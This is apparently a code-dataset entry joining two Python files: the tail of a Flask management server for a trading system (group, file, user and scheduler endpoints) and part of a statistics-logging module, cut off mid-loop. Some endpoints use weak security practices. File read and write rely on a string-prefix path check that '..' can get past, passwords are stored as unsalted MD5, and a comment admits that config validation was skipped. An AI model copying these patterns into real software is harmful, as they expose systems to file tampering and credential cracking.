"message":"请先停止该组合"
}
else:
if True:
self._dog.delApp(id)
self.__data_mgr__.del_group(id)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "delgrp", id)
else:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 组合停止
@app.route("/mgr/stopgrp", methods=["POST"])
def cmd_stop_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
if self._dog.isRunning(grpid):
self._dog.stop(grpid)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "stopgrp", grpid)
return pack_rsp(ret)
# 组合启动
@app.route("/mgr/startgrp", methods=["POST"])
def cmd_start_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
if not self._dog.isRunning(grpid):
self._dog.start(grpid)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "startgrp", grpid)
return pack_rsp(ret)
# 获取执行的python进程的路径
@app.route("/mgr/qryexec", methods=["POST"])
def qry_exec_path():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
ret = {
"result":0,
"message":"Ok",
"path": sys.executable
}
return pack_rsp(ret)
# 配置监控
@app.route("/mgr/qrymon", methods=["POST"])
def qry_mon_cfg():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self._dog.getAppConf(grpid)
if monCfg is None:
ret = {
"result":0,
"message":"ok"
}
else:
ret = {
"result":0,
"message":"ok",
"config":monCfg
}
return pack_rsp(ret)
# 配置监控
@app.route("/mgr/cfgmon", methods=["POST"])
def cmd_config_monitor():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
#这里本来是要做检查的,算了,先省事吧
isGrp = get_param(json_data, "group", bool, False)
self._dog.applyAppConf(json_data, isGrp)
ret = {
"result":0,
"message":"ok"
}
self.__data_mgr__.log_action(adminInfo, "cfgmon", json.dumps(json_data))
return pack_rsp(ret)
# 查询目录结构
@app.route("/mgr/qrydir", methods=["POST"])
def qry_directories():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
if True:
if self.deploy_tree is None:
self.deploy_tree = get_path_tree(self.deploy_dir, "root")
ret = {
"result":0,
"message":"Ok",
"tree":self.deploy_tree
}
else:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询目录结构
@app.route("/mgr/qrygrpdir", methods=["POST"])
def qry_grp_directories():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self.__data_mgr__.get_group(grpid)
ret = {
"result":0,
"message":"Ok",
"tree": get_cfg_tree(monCfg["path"], "root")
}
return pack_rsp(ret)
# 查询组合列表
@app.route("/mgr/qrygrp", methods=["POST"])
def qry_groups():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
try:
groups = self.__data_mgr__.get_groups()
for grpInfo in groups:
grpInfo["running"] = self._dog.isRunning(grpInfo["id"])
ret = {
"result":0,
"message":"Ok",
"groups":groups
}
except:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询文件信息
@app.route("/mgr/qrygrpfile", methods=["POST"])
def qry_group_file():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
path = get_param(json_data, "path")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self.__data_mgr__.get_group(grpid)
root = monCfg["path"]
if path[:len(root)] != root:
ret = {
"result":-1,
"message":"目标文件不在当前组合下"
}
else:
f = open(path,'rb')
content = f.read()
f.close()
encoding = chardet.detect(content)["encoding"]
content = content.decode(encoding)
ret = {
"result":0,
"message":"Ok",
"content": content
}
return pack_rsp(ret)
# 提交组合文件
@app.route("/mgr/cmtgrpfile", methods=["POST"])
def cmd_commit_group_file():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
content = get_param(json_data, "content")
path = get_param(json_data, "path")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self.__data_mgr__.get_group(grpid)
root = monCfg["path"]
if path[:len(root)] != root:
ret = {
"result":-1,
"message":"目标文件不在当前组合下"
}
else:
try:
f = open(path,'rb')
old_content = f.read()
f.close()
encoding = chardet.detect(old_content)["encoding"]
backup_file(path)
f = open(path,'wb')
f.write(content.encode(encoding))
f.close()
ret = {
"result":0,
"message":"Ok"
}
except:
ret = {
"result":-1,
"message":"文件保存失败"
}
return pack_rsp(ret)
# 查询策略列表
@app.route("/mgr/qrystras", methods=["POST"])
def qry_strategys():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"Ok",
"strategies":self.__data_mgr__.get_strategies(grpid)
}
return pack_rsp(ret)
# 查询通道列表
@app.route("/mgr/qrychnls", methods=["POST"])
def qry_channels():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"Ok",
"channels":self.__data_mgr__.get_channels(grpid)
}
return pack_rsp(ret)
# 查询组合日志
@app.route("/mgr/qrylogs", methods=["POST"])
def qry_logs():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "id")
logtype = get_param(json_data, "type")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
grpInfo = self.__data_mgr__.get_group(grpid)
try:
logfolder = os.path.join(grpInfo["path"], "./Logs/")
file_list = os.listdir(logfolder)
targets = list()
for fname in file_list:
if fname[:6] == "Runner":
targets.append(fname)
targets.sort()
filename = os.path.join(logfolder, targets[-1])
content,lines = get_tail(filename, 100)
ret = {
"result":0,
"message":"Ok",
"content":content,
"lines":lines
}
except:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询策略成交
@app.route("/mgr/qrytrds", methods=["POST"])
def qry_trades():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"trades": self.__data_mgr__.get_trades(gid, sid)
}
return pack_rsp(ret)
# 查询策略信号
@app.route("/mgr/qrysigs", methods=["POST"])
def qry_signals():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"signals": self.__data_mgr__.get_signals(gid, sid)
}
return pack_rsp(ret)
# 查询策略回合
@app.route("/mgr/qryrnds", methods=["POST"])
def qry_rounds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"rounds": self.__data_mgr__.get_rounds(gid, sid)
}
return pack_rsp(ret)
# 查询策略持仓
@app.route("/mgr/qrypos", methods=["POST"])
def qry_positions():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"positions": self.__data_mgr__.get_positions(gid, sid)
}
return pack_rsp(ret)
# 查询策略持仓
@app.route("/mgr/qryfunds", methods=["POST"])
def qry_funds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"funds": self.__data_mgr__.get_funds(gid, sid)
}
return pack_rsp(ret)
# 查询通道订单
@app.route("/mgr/qrychnlords", methods=["POST"])
def qry_channel_orders():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"orders": self.__data_mgr__.get_channel_orders(gid, cid)
}
return pack_rsp(ret)
# 查询通道成交
@app.route("/mgr/qrychnltrds", methods=["POST"])
def qry_channel_trades():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"trades": self.__data_mgr__.get_channel_trades(gid, cid)
}
return pack_rsp(ret)
# 查询通道持仓
@app.route("/mgr/qrychnlpos", methods=["POST"])
def qry_channel_position():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"positions": self.__data_mgr__.get_channel_positions(gid, cid)
}
return pack_rsp(ret)
# 查询通道资金
@app.route("/mgr/qrychnlfund", methods=["POST"])
def qry_channel_funds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"funds": self.__data_mgr__.get_channel_funds(gid, cid)
}
return pack_rsp(ret)
# 查询用户列表
@app.route("/mgr/qryusers", methods=["POST"])
def qry_users():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
users = self.__data_mgr__.get_users()
for usrInfo in users:
usrInfo.pop("passwd")
ret = {
"result":0,
"message":"",
"users": users
}
return pack_rsp(ret)
# 提交用户信息
@app.route("/mgr/cmtuser", methods=["POST"])
def cmd_commit_user():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
self.__data_mgr__.add_user(json_data, adminInfo["loginid"])
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "cmtuser", json.dumps(json_data))
return pack_rsp(ret)
# Delete a user
@app.route("/mgr/deluser", methods=["POST"])
def cmd_delete_user():
    """Delete user *loginid*; the action is logged only when deletion succeeds."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    loginid = get_param(json_data, "loginid")
    if self.__data_mgr__.del_user(loginid, adminInfo["loginid"]):
        self.__data_mgr__.log_action(adminInfo, "delusr", loginid)
        ret = {
            "result":0,
            "message":"Ok"
        }
    else:
        # BUGFIX: the original replied "Ok" even when del_user failed;
        # report the failure to the client instead
        ret = {
            "result":-1,
            "message":"删除用户失败"
        }
    return pack_rsp(ret)
# Reset a user's password
@app.route("/mgr/resetpwd", methods=["POST"])
def reset_pwd():
    """Reset the password of *loginid*; the stored hash is md5(loginid + passwd)."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    user = get_param(json_data, "loginid")
    pwd = get_param(json_data, "passwd")
    if len(pwd) == 0 or len(user) == 0:
        ret = {
            "result":-1,
            "message":"密码都不能为空"
        }
    else:
        # Hash scheme must match the one used by the login check
        encpwd = hashlib.md5((user+pwd).encode("utf-8")).hexdigest()
        usrInf = self.__data_mgr__.get_user(user)
        if usrInf is None:
            ret = {
                "result":-1,
                "message":"用户不存在"
            }
        else:
            self.__data_mgr__.mod_user_pwd(user, encpwd, adminInfo["loginid"])
            # BUGFIX: the original logged the undefined name `loginid`, which
            # raised NameError on every successful reset; log `user` instead
            self.__data_mgr__.log_action(adminInfo, "resetpwd", user)
            ret = {
                "result":0,
                "message":"Ok"
            }
    return pack_rsp(ret)
# Query admin action records in a date range
@app.route("/mgr/qryacts", methods=["POST"])
def qry_actions():
    """Return the recorded admin actions between *sdate* and *edate*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    start_date = get_param(json_data, "sdate")
    end_date = get_param(json_data, "edate")
    actions = self.__data_mgr__.get_actions(start_date, end_date)
    return pack_rsp({
        "result": 0,
        "message": "",
        "actions": actions
    })
# Query all scheduled apps
@app.route("/mgr/qrymons", methods=["POST"])
def qry_mon_apps():
    """Return every app managed by the watchdog, flagging which are strategy groups."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    schedules = self._dog.get_apps()
    # Mark apps that are also strategy groups so the frontend can treat them differently
    for appid in schedules:
        schedules[appid]["group"] = self.__data_mgr__.has_group(appid)
    ret = {
        "result":0,
        "message":"",
        "schedules": schedules
    }
    return pack_rsp(ret)
@app.route("/mgr/startapp", methods=["POST"])
def cmd_start_app():
    """Start the watchdog-managed app *appid* (no-op if already running)."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    appid = get_param(json_data, "appid")
    if not self._dog.has_app(appid):
        ret = {
            "result":-1,
            "message":"App不存在"
        }
    else:
        if not self._dog.isRunning(appid):
            self._dog.start(appid)
        ret = {
            "result":0,
            "message":"Ok"
        }
        # Logged even if the app was already running
        self.__data_mgr__.log_action(adminInfo, "startapp", appid)
    return pack_rsp(ret)
# Stop a scheduled app
@app.route("/mgr/stopapp", methods=["POST"])
def cmd_stop_app():
    """Stop the watchdog-managed app *appid* if it is currently running."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    appid = get_param(json_data, "appid")
    if self._dog.has_app(appid):
        # Stopping an app that is not running is a no-op, but is still logged
        if self._dog.isRunning(appid):
            self._dog.stop(appid)
        ret = {
            "result": 0,
            "message": "Ok"
        }
        self.__data_mgr__.log_action(adminInfo, "stopapp", appid)
    else:
        ret = {
            "result": -1,
            "message": "App不存在"
        }
    return pack_rsp(ret)
# Query the scheduler's log tail
@app.route("/mgr/qrymonlog", methods=["POST"])
def qry_mon_logs():
    """Return the last 100 lines of the watchdog log file."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    # NOTE(review): path is relative to the current working directory — confirm
    # the service is always launched from its install root
    filename = os.getcwd() + "/logs/WtMonSvr.log"
    content,lines = get_tail(filename, 100, "UTF-8")
    ret = {
        "result":0,
        "message":"Ok",
        "content":content,
        "lines":lines
    }
    return pack_rsp(ret)
# Delete a scheduled task
@app.route("/mgr/delapp", methods=["POST"])
def cmd_del_app():
    """Delete scheduled app *appid* after validating that it is deletable.

    Rejected when the id is empty (-1), the task is a strategy group (-2),
    the task is unknown (-3), or the task is still running (-4).
    """
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, adminInfo = check_auth()
    if not bSucc:
        return pack_rsp(adminInfo)

    # Renamed from `id` to avoid shadowing the builtin
    appid = get_param(json_data, "appid")
    if len(appid) == 0:
        ret = {
            "result":-1,
            "message":"组合ID不能为空"
        }
    elif self.__data_mgr__.has_group(appid):
        ret = {
            "result":-2,
            "message":"该调度任务是策略组合,请从组合管理删除"
        }
    elif not self._dog.has_app(appid):
        ret = {
            "result":-3,
            "message":"该调度任务不存在"
        }
    elif self._dog.isRunning(appid):
        ret = {
            "result":-4,
            "message":"请先停止该任务"
        }
    else:
        # BUGFIX: removed a dead `if True:` wrapper whose else branch
        # ("请求解析失败") was unreachable
        self._dog.delApp(appid)
        ret = {
            "result":0,
            "message":"Ok"
        }
        self.__data_mgr__.log_action(adminInfo, "delapp", appid)
    return pack_rsp(ret)
# Query group positions
@app.route("/mgr/qryportpos", methods=["POST"])
def qry_group_positions():
    """Return the aggregated positions of group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    gid = get_param(json_data, "groupid")
    if not self.__data_mgr__.has_group(gid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        ret = {
            "result":0,
            "message":"",
            "positions": self.__data_mgr__.get_group_positions(gid)
        }
    return pack_rsp(ret)
# Query group trades
@app.route("/mgr/qryporttrd", methods=["POST"])
def qry_group_trades():
    """Return the trade records of group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    gid = get_param(json_data, "groupid")
    if not self.__data_mgr__.has_group(gid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        ret = {
            "result":0,
            "message":"",
            "trades": self.__data_mgr__.get_group_trades(gid)
        }
    return pack_rsp(ret)
# Query group round-trips
@app.route("/mgr/qryportrnd", methods=["POST"])
def qry_group_rounds():
    """Return the round-trip (open/close pair) records of group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    gid = get_param(json_data, "groupid")
    if not self.__data_mgr__.has_group(gid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        ret = {
            "result":0,
            "message":"",
            "rounds": self.__data_mgr__.get_group_rounds(gid)
        }
    return pack_rsp(ret)
# Query group funds
@app.route("/mgr/qryportfunds", methods=["POST"])
def qry_group_funds():
    """Return the fund/account data of group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    gid = get_param(json_data, "groupid")
    if not self.__data_mgr__.has_group(gid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        ret = {
            "result":0,
            "message":"",
            "funds": self.__data_mgr__.get_group_funds(gid)
        }
    return pack_rsp(ret)
# Query group performance analysis
@app.route("/mgr/qryportperfs", methods=["POST"])
def qry_group_perfs():
    """Return the performance analysis data of group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    gid = get_param(json_data, "groupid")
    if not self.__data_mgr__.has_group(gid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        ret = {
            "result":0,
            "message":"",
            "performance": self.__data_mgr__.get_group_performances(gid)
        }
    return pack_rsp(ret)
# Query group filters
@app.route("/mgr/qryportfilters", methods=["POST"])
def qry_group_filters():
    """Return the strategy/code filters configured for group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    gid = get_param(json_data, "groupid")
    if not self.__data_mgr__.has_group(gid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        ret = {
            "result":0,
            "message":"",
            "filters": self.__data_mgr__.get_group_filters(gid)
        }
    return pack_rsp(ret)
# Commit group filters
@app.route("/mgr/cmtgrpfilters", methods=["POST"])
def cmd_commit_group_filters():
    """Persist the strategy/code filters of group *groupid*."""
    bSucc, json_data = parse_data()
    if not bSucc:
        return pack_rsp(json_data)

    bSucc, usrInfo = check_auth()
    if not bSucc:
        return pack_rsp(usrInfo)

    grpid = get_param(json_data, "groupid")
    filters = get_param(json_data, "filters", type=dict)
    if not self.__data_mgr__.has_group(grpid):
        ret = {
            "result":-1,
            "message":"组合不存在"
        }
    else:
        try:
            self.__data_mgr__.set_group_filters(grpid, filters)
            ret = {
                "result":0,
                "message":"Ok"
            }
        except Exception:
            # BUGFIX: was a bare `except:` which would also swallow
            # SystemExit/KeyboardInterrupt; the best-effort reply is kept
            ret = {
                "result":-1,
                "message":"过滤器保存失败"
            }
    return pack_rsp(ret)
def __run_impl__(self, port:int, host:str):
    """Start the watchdog scheduler, then block serving the push/HTTP server."""
    self._dog.run()
    self.push_svr.run(port = port, host = host)
def run(self, port:int = 8080, host="0.0.0.0", bSync:bool = True):
    """Run the monitor service.

    *port*/*host* are passed to the embedded web server. With bSync=True the
    call blocks; otherwise the service runs on a background daemon thread
    stored in self.worker.
    """
    if bSync:
        self.__run_impl__(port, host)
    else:
        import threading
        self.worker = threading.Thread(target=self.__run_impl__, args=(port,host,))
        # BUGFIX: Thread.setDaemon() is deprecated (removed in Python 3.12+);
        # assign the daemon attribute directly instead
        self.worker.daemon = True
        self.worker.start()
def init_logging(self):
    """Hook for logging setup; intentionally a no-op in this implementation."""
    pass
def on_start(self, grpid:str):
    """Watchdog callback: broadcast a 'start' event for a known group."""
    if self.__data_mgr__.has_group(grpid):
        self.push_svr.notifyGrpEvt(grpid, 'start')
def on_stop(self, grpid:str, isErr:bool):
    """Watchdog callback: broadcast 'stop'; escalate abnormal exits to the sink."""
    if self.__data_mgr__.has_group(grpid):
        self.push_svr.notifyGrpEvt(grpid, 'stop')

    # An unexpected stop is escalated to the notification sink, if one is set
    if isErr and self._sink_:
        grpInfo = self.__data_mgr__.get_group(grpid)
        self._sink_.notify("fatal", "检测到 %s[%s] 意外停止, 请及时处理!!!"%(grpInfo["name"], grpid))
def on_output(self, grpid:str, tag:str, time:int, message:str):
    """Watchdog callback: forward a log line of a known group to push subscribers."""
    # NOTE: the parameter `time` shadows the stdlib module name inside this method
    if self.__data_mgr__.has_group(grpid):
        self.push_svr.notifyGrpLog(grpid, tag, time, message)
def on_order(self, grpid:str, chnl:str, ordInfo:dict):
    """Watchdog callback: push an order event of channel *chnl* to subscribers."""
    self.push_svr.notifyGrpChnlEvt(grpid, chnl, 'order', ordInfo)
def on_trade(self, grpid:str, chnl:str, trdInfo:dict):
    """Watchdog callback: push a trade event of channel *chnl* to subscribers."""
    self.push_svr.notifyGrpChnlEvt(grpid, chnl, 'trade', trdInfo)
def on_notify(self, grpid:str, chnl:str, message:str):
    """Watchdog callback: push a plain notification message to subscribers."""
    self.push_svr.notifyGrpChnlEvt(grpid, chnl, 'notify', message)
stats.py | """
Simple and lightweight statistics collection module.
Logging is done in a separate process to minimize influence of logging on program execution.
"""
from multiprocessing import Process, Queue
from queue import Empty
import csv
from enum import Enum
import datetime
import logging
import time
import sys
import os
# target sleep time in between counter measurements in ms
TARGET_SLEEP_TIME = 1000
class Stats:
    """
    Class for statistics collection.

    The factory methods (new_counter/new_averager/new_logger) hand out
    lightweight proxies that push measurement messages onto a multiprocessing
    queue; a background process drains the queue and periodically flushes CSV
    files, keeping logging overhead in the instrumented program minimal.
    """

    class MessageType(Enum):
        """
        Message types used for multiprocess communication.
        """
        STOP = 0
        NEW_LOGGER = 1
        NEW_COUNTER = 2
        NEW_AVERAGER = 3
        NEW_LOGGER_VAL = 4
        NEW_COUNTER_VAL = 5
        NEW_AVERAGER_VAL = 6
        SUBFOLDER = 7
        STARTTIME = 8

    class Message():
        """
        Messages sent to the logger process of stats.
        """

        def __init__(self, typ, name='', value=0, timestamp=0):
            self.type = typ
            self.name = name
            self.value = value
            self.timestamp = timestamp

        def get_type(self):
            """
            Type of the message (a Stats.MessageType member).
            """
            return self.type

        def get_name(self):
            """
            Name of the logger/counter/averager the message refers to.
            """
            return self.name

        def get_value(self):
            """
            Measured value carried by the message.
            """
            return self.value

        def get_timestamp(self):
            """
            Timestamp of the measured value.
            """
            return self.timestamp

    class StatisticsThread():
        """
        Prints and writes statistics collected asynchronously.

        Despite the name this runs as a separate *process* (multiprocessing),
        so CSV writing never blocks the instrumented program.
        """

        def __init__(self, queue, stats, subfolder):
            self.queue = queue
            self.stats = stats
            self.loggers = {}
            self.counters = {}
            self.averagers = {}
            self.subfolder = subfolder
            self.starttime = ''
            self.process = Process(target=self.run, args=(self.queue, self.stats, self.subfolder))
            self.process.start()

        def print_averagers(self):
            """
            Write the value of every averager registered to a .csv file.
            """
            path = self.subfolder + '/' + self.starttime + '_averagers.csv'
            # Only append if the header file was created successfully
            if not os.path.exists(path):
                return
            if list(self.averagers.keys()):
                lst = [int(time.monotonic()*1000)]
                for avg in list(self.averagers.keys()):
                    lst.append(self.averagers[avg])
                with open(path, 'a+', newline='') as csvfile:
                    csvwriter = csv.writer(csvfile, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                    csvwriter.writerow(lst)

        def print_counters(self):
            """
            Write the value of every counter registered to a .csv file.
            """
            path = self.subfolder + '/' + self.starttime + '_counters.csv'
            if not os.path.exists(path):
                return
            if list(self.counters.keys()):
                lst = [int(time.monotonic()*1000)]
                for cnt in list(self.counters.keys()):
                    lst.append(self.counters[cnt])
                with open(path, 'a+', newline='') as csvfile:
                    csvwriter = csv.writer(csvfile, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                    csvwriter.writerow(lst)

        def print_loggers(self):
            """
            Flush the buffered rows of every timestamp logger to its own file.
            """
            if list(self.loggers.keys()):
                for logger in list(self.loggers.keys()):
                    path = self.subfolder + '/' + self.starttime + "_" + logger + '.csv'
                    if not os.path.exists(path):
                        continue
                    with open(path, 'a', newline='') as csvfile:
                        csvwriter = csv.writer(csvfile, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
                        for date in self.loggers[logger]:
                            csvwriter.writerow(date)
                    # Rows are buffered between flushes; reset after writing
                    self.loggers[logger] = []

        def write(self):
            """
            Log all the collected data to csv files.
            """
            self.print_averagers()
            self.print_counters()
            self.print_loggers()

        def create_header(self, tname, line):
            """
            Create a header for a csv file (truncates any existing file).
            """
            try:
                os.makedirs(self.subfolder, exist_ok=True)
                # BUGFIX: use a context manager so the handle is closed on
                # error, and catch OSError instead of a bare except
                with open(tname, 'w') as fil:
                    fil.write(line)
            except OSError:
                logging.error(tname + ' could not be created')

        def run(self, queue, stats, subfolder):
            """
            Message processing loop of the logger process.
            """
            self.starttime = str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%H%M%S'))
            self.subfolder = subfolder
            tmstp = time.monotonic() * 1000 + TARGET_SLEEP_TIME
            while True:
                try:
                    if tmstp < (time.monotonic() * 1000):
                        self.write()
                        # CONSISTENCY FIX: advance by the configured interval
                        # instead of a hard-coded 1000
                        tmstp = tmstp + TARGET_SLEEP_TIME
                    msg = queue.get_nowait()
                    if msg.get_type() == stats.MessageType.STOP:
                        break
